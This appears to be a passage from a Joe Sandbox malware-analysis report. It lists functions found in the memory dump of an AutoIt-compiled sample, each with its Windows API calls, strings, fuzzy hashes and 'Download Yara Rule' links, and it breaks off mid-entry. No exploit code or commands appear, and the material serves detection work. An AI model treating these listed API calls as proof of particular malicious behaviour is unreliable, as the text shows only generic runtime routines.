Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: f5f6ca4c9e21bff7142d18c393e5558ef6f5a217fe448cc1c18197b45cd8a68e
Instruction ID: 55cab8fc8a814e69b5813ca49ebef9f82bbc7a765fa01c4d7854cee27e60e64c
Opcode Fuzzy Hash: f5f6ca4c9e21bff7142d18c393e5558ef6f5a217fe448cc1c18197b45cd8a68e
Instruction Fuzzy Hash: E8915A706083019FCB10DF24C59199ABBF4AF89710F04496DF89ADB362DB31E985CB62

Function 00A55347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A2C6F4: _wcscpy.LIBCMT ref: 00A2C717

_memset.LIBCMT ref: 00A55438
GetMenuItemInfoW.USER32(?), ref: 00A55467
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A55513
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00A5553D

Strings

0, xrefs: 00A55430

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 84f095db4415d320da4bc00e86ffbf96b4cfe5dc5d6849592d208320e61819ef
Instruction ID: 4a748f1a0a58f61fe054590079ed42dd346732d8d29875b13117774f5cc33b88
Opcode Fuzzy Hash: 84f095db4415d320da4bc00e86ffbf96b4cfe5dc5d6849592d208320e61819ef
Instruction Fuzzy Hash: C5510171A047019BD714DB38C9616ABB7F9BF85362F04062AFC9AD71A1EB70CD48CB52

Function 00A50213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00A5027B
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00A502B1
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00A502C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00A50344

Strings

DllGetClassObject, xrefs: 00A502B7

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: d05e1cfa697f94adcceb737b4f2a8d349f272ec50fbb16c48dafeea1face4851
Instruction ID: 7c01ba3638522d8822492bcd1bd2ead42e3409e659d0e145614fd9ee764f8b1f
Opcode Fuzzy Hash: d05e1cfa697f94adcceb737b4f2a8d349f272ec50fbb16c48dafeea1face4851
Instruction Fuzzy Hash: 17415B71600204EFDB15CF54D889F9A7BB9FF44322B1480ADAD09DF216D7B1D948CBA0

Function 00A55007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A55075
GetMenuItemInfoW.USER32 ref: 00A55091
DeleteMenu.USER32(00000004,00000007,00000000), ref: 00A550D7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00AD1708,00000000), ref: 00A55120

Strings

0, xrefs: 00A5506D

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: bfa6a65b9c3045c50575671dd8ec2088d92460190f87959c1decdb2eec403dda
Instruction ID: 504e71800b22f2b7d233ed28c71969417da3344e2457088afcd9e94d58e59427
Opcode Fuzzy Hash: bfa6a65b9c3045c50575671dd8ec2088d92460190f87959c1decdb2eec403dda
Instruction Fuzzy Hash: 5141CF30604B01AFD720EF38D894B6ABBE4BF89325F144A1EFD5597291D730E848CB62

Function 00A5E698 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00A5E742
GetLastError.KERNEL32(?,00000000), ref: 00A5E768
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00A5E78D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00A5E7B9

Strings

p1Wu`KXu, xrefs: 00A5E78D

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID: p1Wu`KXu
API String ID: 3321077145-4063981602
Opcode ID: c4fc5c22f3436a002fd676a5e12465c3b30906f2a954e6ee2375b3ae5f312e57
Instruction ID: 27c176827e85fd51155d31589d44e1e86f5862b74a5d092a8e49d96357191b84
Opcode Fuzzy Hash: c4fc5c22f3436a002fd676a5e12465c3b30906f2a954e6ee2375b3ae5f312e57
Instruction Fuzzy Hash: A9413A35A00610DFCB15EF15C644A8DBBE5BF59710B098099ED16AF3A2CB34FD45CB91

Function 00A70567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 00A70587

Strings

winapi, xrefs: 00A705F8
stdcall, xrefs: 00A70609
none, xrefs: 00A70662
cdecl, xrefs: 00A705DE

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: ca2520cb1622a75c3abf01599205958837c7d7803b21c06686de5b75f2140863
Instruction ID: a26957e8b72a99b87bd9a6c0c8aab3eb66ddf82741816132bd555ca5e309ebb0
Opcode Fuzzy Hash: ca2520cb1622a75c3abf01599205958837c7d7803b21c06686de5b75f2140863
Instruction Fuzzy Hash: 5F31907050021AAFCF00EF98CE51EEEB3B5FF54314B10C629E82AA76D1DB71A955CB90

Function 00A4B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00A4B88E
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00A4B8A1
SendMessageW.USER32(?,00000189,?,00000000), ref: 00A4B8D1

Strings

ComboBox, xrefs: 00A4B815
ListBox, xrefs: 00A4B84D

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 673710e726175ad041673cd7a23a05eecc1ff5e2bc839e6fb20cceffabccfec7
Instruction ID: 0129cd19e8447b467a841d2b0bbf24961e5e335337078435fc9247178d812a2c
Opcode Fuzzy Hash: 673710e726175ad041673cd7a23a05eecc1ff5e2bc839e6fb20cceffabccfec7
Instruction Fuzzy Hash: B121027AA00208BFDB04ABB4D986DFE777CEF85360B104529F021A31E1DB748D4A9760

Function 00A643E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A64401
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A64427
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A64457
InternetCloseHandle.WININET(00000000), ref: 00A6449E

Part of subcall function 00A65052: GetLastError.KERNEL32(?,?,00A643CC,00000000,00000000,00000001), ref: 00A65067

Strings

, xrefs: 00A64450

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: 2ec823b19ead8c25dac265bfe93f079bcd679f208f2aa34f7160c0d640420aca
Instruction ID: d3f7d52eb0760979fa986dcc8aa7f345485de1d267d0aa7398618502443e0d62
Opcode Fuzzy Hash: 2ec823b19ead8c25dac265bfe93f079bcd679f208f2aa34f7160c0d640420aca
Instruction Fuzzy Hash: AB215BB2600208BFE7119FA4CD8AEBBBAFCEB48758F10851AF509A6140EE64DD459771

Function 00A790E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A2D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A2D1BA
Part of subcall function 00A2D17C: GetStockObject.GDI32(00000011), ref: 00A2D1CE
Part of subcall function 00A2D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A2D1D8

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00A7915C
LoadLibraryW.KERNEL32(?), ref: 00A79163
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A79178
DestroyWindow.USER32(?), ref: 00A79180

Strings

SysAnimate32, xrefs: 00A79137

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 4385db9c1d58a5eb04b27dbec7eb062797aa71db52b1d283d71fcf6d372a61fc
Instruction ID: 4449359ad6e2547a2f36bbd02eb647091ee674e8d5fc490e56a35b7b06c2afa6
Opcode Fuzzy Hash: 4385db9c1d58a5eb04b27dbec7eb062797aa71db52b1d283d71fcf6d372a61fc
Instruction Fuzzy Hash: DE218E71210206BBEF108FA4DC85EBB77A9EB99364F50C71AFA1892190C731DC62A761

Function 00A59568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00A59588
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A595B9
GetStdHandle.KERNEL32(0000000C), ref: 00A595CB
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00A59605

Strings

nul, xrefs: 00A59600

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 906fd8d96ddf9a4df37b92a309f4583f5ee8fab2c0b15e32ca0e4db1b5ec055f
Instruction ID: cf2ac57cb5b9d33c23d93e25af6bf6561519e5713165279c2c2262f651c13872
Opcode Fuzzy Hash: 906fd8d96ddf9a4df37b92a309f4583f5ee8fab2c0b15e32ca0e4db1b5ec055f
Instruction Fuzzy Hash: 2E217CB4600205EBDB219F65DC05A9B7BB8BF48721F204A19FCA1DB2D0EB70D959CB10

Function 00A59634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00A59653
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A59683
GetStdHandle.KERNEL32(000000F6), ref: 00A59694
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00A596CE

Strings

nul, xrefs: 00A596C9

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: eb0ec0913ee4892116831c776431b4880c71c68832bbeb8afd46657b52c7cb0a
Instruction ID: 0a475988b831aebb7ba2829b4e0f07fc804d0f7ccabd2e06b85138d63066dfc7
Opcode Fuzzy Hash: eb0ec0913ee4892116831c776431b4880c71c68832bbeb8afd46657b52c7cb0a
Instruction Fuzzy Hash: 7D215C75600205EBDB209F69DC44E9B77A8BF45721F200A19FCA1EB2D0EB70988DCB50

Function 00A5DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00A5DB0A
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00A5DB5E
__swprintf.LIBCMT ref: 00A5DB77
SetErrorMode.KERNEL32(00000000,00000001,00000000,00AADC00), ref: 00A5DBB5

Strings

%lu, xrefs: 00A5DB71

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: c2db026b31345d1a74d87a6ff4ee03621d83831a22e5803ebbc3937c4b726535
Instruction ID: a54593ea869fadb8932e388c9217c07538d13120bcc454a26265ddfe8dcba084
Opcode Fuzzy Hash: c2db026b31345d1a74d87a6ff4ee03621d83831a22e5803ebbc3937c4b726535
Instruction Fuzzy Hash: A021A735A00208AFCB10EFA4DE85EEEB7B8FF49714B114069F905D7251DB70EA45CB60

Function 00A4C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A4C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00A4C84A
Part of subcall function 00A4C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A4C85D
Part of subcall function 00A4C82D: GetCurrentThreadId.KERNEL32 ref: 00A4C864
Part of subcall function 00A4C82D: AttachThreadInput.USER32(00000000), ref: 00A4C86B

GetFocus.USER32 ref: 00A4CA05

Part of subcall function 00A4C876: GetParent.USER32(?), ref: 00A4C884

GetClassNameW.USER32(?,?,00000100), ref: 00A4CA4E
EnumChildWindows.USER32(?,00A4CAC4), ref: 00A4CA76
__swprintf.LIBCMT ref: 00A4CA90

Strings

%s%d, xrefs: 00A4CA8A

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
String ID: %s%d
API String ID: 3187004680-1110647743
Opcode ID: fb5cc8ec3334c4d5fd372644e59afe63eeb2bf2a276fd061366c6c370276908f
Instruction ID: 3a474346ca307693e40d2749de07553e8e95223261cc17790ac37fa2cf1d5dfb
Opcode Fuzzy Hash: fb5cc8ec3334c4d5fd372644e59afe63eeb2bf2a276fd061366c6c370276908f
Instruction Fuzzy Hash: 26117F79600209BBCB51BFA09D85FE93779AF84764F008066FA0DAA182DB709946DB70

Function 00A71945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A719F3
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00A71A26
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00A71B49
CloseHandle.KERNEL32(?), ref: 00A71BBF

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 5d37dba99c4e247de8088b4d2b4f21a71aae41135cdc8ddd73326d47dafa3e9d
Instruction ID: 00ea4dce97167c537a7ffb34b3b27195608a2811ce94e5c87ca822a1b6ac6633
Opcode Fuzzy Hash: 5d37dba99c4e247de8088b4d2b4f21a71aae41135cdc8ddd73326d47dafa3e9d
Instruction Fuzzy Hash: 4E815171600214ABDF109F68CD96BADBBF5AF44720F14C469F909AF382D7B5A9418F90

Function 00A7E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00A7E1D5
SendMessageW.USER32(?,000000B0,?,?), ref: 00A7E20D
IsDlgButtonChecked.USER32(?,00000001), ref: 00A7E248
GetWindowLongW.USER32(?,000000EC), ref: 00A7E269
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00A7E281

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend$ButtonCheckedLongWindow
String ID:
API String ID: 3188977179-0
Opcode ID: 63898b1b72b6a2d7e09f39154a312113f28bc7ddcb2a3d1d4094d047eda9f29a
Instruction ID: 11c2224e65629c2bc34c8f3f97fd621de5be6565f1c95e02ec2e02a34dbdcbf4
Opcode Fuzzy Hash: 63898b1b72b6a2d7e09f39154a312113f28bc7ddcb2a3d1d4094d047eda9f29a
Instruction Fuzzy Hash: 58619D34A40204AFDB20CF58CC95FAA77BAAB9D300F54C1DAF95E973A1C774A941CB11

Function 00A51C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A51CB4
VariantClear.OLEAUT32(00000013), ref: 00A51D26
VariantClear.OLEAUT32(00000000), ref: 00A51D81
VariantClear.OLEAUT32(?), ref: 00A51DF8
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00A51E26

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: a206ac2bf5020ff03735064e6bfc929a113a6a893c3922bd0c11aee368b1ef6b
Instruction ID: 8e610b46f106ff198cd583b8a6635835f8eaa1a276e08e0cb589ec53db8854b8
Opcode Fuzzy Hash: a206ac2bf5020ff03735064e6bfc929a113a6a893c3922bd0c11aee368b1ef6b
Instruction Fuzzy Hash: 605139B5A00209AFDB14CF58C880AAAB7F8FF8C314B158559ED59DB301E730EA55CFA0

Function 00A70688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00A1936C: __swprintf.LIBCMT ref: 00A193AB
Part of subcall function 00A1936C: __itow.LIBCMT ref: 00A193DF

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00A706EE
GetProcAddress.KERNEL32(00000000,?), ref: 00A7077D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00A7079B
GetProcAddress.KERNEL32(00000000,?), ref: 00A707E1
FreeLibrary.KERNEL32(00000000,00000004), ref: 00A707FB

Part of subcall function 00A2E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00A5A574,?,?,00000000,00000008), ref: 00A2E675
Part of subcall function 00A2E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00A5A574,?,?,00000000,00000008), ref: 00A2E699

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 8be214acded02866bdc7ec21b5830a467c1b2dfd3b518c651e2de3e78680affc
